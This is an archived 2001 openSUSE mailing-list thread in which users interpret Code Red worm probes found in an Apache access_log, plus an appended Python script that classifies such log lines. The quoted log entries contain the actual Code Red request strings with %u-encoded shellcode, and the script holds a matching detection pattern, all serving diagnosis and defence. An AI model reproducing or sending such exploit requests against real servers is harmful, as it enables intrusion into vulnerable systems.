Mailinglist Archive: opensuse (4053 mails)

Re: [SLE] code red question....
You should really be running some sort of firewall, even if you are connected
to the internet for only a short time each day. In checking through my
firewall logs, there have been 412 probes of my machine in the last 30 hours
or so, which is a lot more than normal, by a factor of about a hundred! This
does seem to be affecting mostly routers and IIS, but I doubt that it will be
very long before some devious person comes up with a widespread virus or worm
that could compromise a Unix machine. One basic precaution that I take is to
never access the internet (or open any file that I don't recognize!) while
logged in as root.

Kevin

On Tuesday 07 August 2001 20:06, Curtis Rey wrote:
> I've got the same sort of logs on my sys. I have disabled forwarding. What,
> if anything, should I shut down?
>
> Cheers, Curtis
>
> On Tuesday 07 August 2001 11:19, Anders Johansson wrote:
> > On Tuesday 07 August 2001 12:53, Jim Hatridge wrote:
> > > Hi all..
> > >
> > > After all this talk about code red, I looked at my access_log and found
> > > this stuff. Is this the code red attack? If so, do I need to worry
> > > about it? I'm running a "plain jane" install of SuSE 7.1 on my internet
> > > machine. I am on a 56k dialup and only on the net about 30 minutes per
> > > day. Also the first line (127.---) is that my localhost?
> > >
> > >
> > > TIA
> > >
> > >
> > > JIM
> > >
> > > ***********************************************************************
> > >
> > > 127.0.0.1 - - [09/Apr/2001:11:43:57 +0200] "GET /robots.txt HTTP/1.0" 200 231
> >
> > 127.0.0.1 is localhost, yes, so this is some program on your machine
> > trying to see if you have robots.txt - a file that tells web spiders your
> > 'spider policy'. In this file you can put web directories you don't want
> > indexing agents and other web crawling agents to touch.
> >
> > > 194.158.105.5 - - [22/Apr/2001:16:14:55 +0200] "GET http://www.amd.com/ HTTP/1.0" 200 4676
> >
> > This looks like someone trying to use your comp as a proxy.
> >
> > The rest are code red, but as has been pointed out, only IIS users need
> > worry about it.
> >
> > > 24.139.0.245 - - [22/Jul/2001:12:40:53 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 319
> > >
> > > 212.84.163.91 - - [01/Aug/2001:21:18:55 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 319
> > >
> > > 202.105.119.98 - - [04/Aug/2001:14:59:04 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 319
> > >
> > > 213.168.222.197 - - [04/Aug/2001:19:54:47 +0200] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 272
> > >
> > > 211.222.31.2 - - [04/Aug/2001:20:10:21 +0200] "GET /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 319
> > >
> > > ***********************************************************************
> >
> > regards
> > Anders

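Anders walks through Jim's access_log entry by entry: a localhost request, a request for a full URL (a proxy attempt), and the /default.ida Code Red probes. The following is an added example, not code from this thread, that automates that triage over a few constructed Apache common-log lines modelled on the excerpt (the Code Red query string is shortened here; the real one carries a much longer run of N's):

```python
import re
from collections import Counter

# Apache common log format: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# Constructed sample lines (shortened from the ones quoted in the thread).
SAMPLE_LOG = """\
127.0.0.1 - - [09/Apr/2001:11:43:57 +0200] "GET /robots.txt HTTP/1.0" 200 231
194.158.105.5 - - [22/Apr/2001:16:14:55 +0200] "GET http://www.amd.com/ HTTP/1.0" 200 4676
24.139.0.245 - - [22/Jul/2001:12:40:53 +0200] "GET /default.ida?NNNNNNNNNN%u9090%u6858%ucbd3%u7801 HTTP/1.0" 400 319
213.168.222.197 - - [04/Aug/2001:19:54:47 +0200] "GET /default.ida?XXXXXXXXXX%u9090%u6858%ucbd3%u7801 HTTP/1.0" 404 272
10.0.0.7 - - [05/Aug/2001:09:00:00 +0200] "GET /index.html HTTP/1.0" 200 1024
"""

def classify(line):
    """Label one access_log line the way the thread does."""
    m = LOG_RE.match(line)
    if not m:
        return "unparsed"
    host, target = m.group("host"), m.group("target")
    if host.startswith("127."):
        return "localhost"        # a process on this machine, e.g. a local crawler
    if target.startswith("/default.ida?"):
        return "code_red"         # IIS .ida probe; a non-IIS host just logs 400/404
    if re.match(r"^[a-z][a-z0-9+.-]*://", target, re.I):
        return "proxy_attempt"    # absolute URI: someone trying to relay through us
    return "normal"

def summarize(log_text):
    """Return (counts per category, sorted list of Code Red source hosts)."""
    counts = Counter()
    code_red_sources = set()
    for line in log_text.splitlines():
        kind = classify(line)
        counts[kind] += 1
        if kind == "code_red":
            code_red_sources.add(LOG_RE.match(line).group("host"))
    return dict(counts), sorted(code_red_sources)

if __name__ == "__main__":
    counts, sources = summarize(SAMPLE_LOG)
    print(counts)
    print("Code Red sources:", sources)
```

Feed it a real access_log instead of SAMPLE_LOG to get the same breakdown for your own machine; the proxy_attempt and code_red counts are the ones worth watching, and a 400 or 404 on /default.ida confirms the probe did nothing on a non-IIS server.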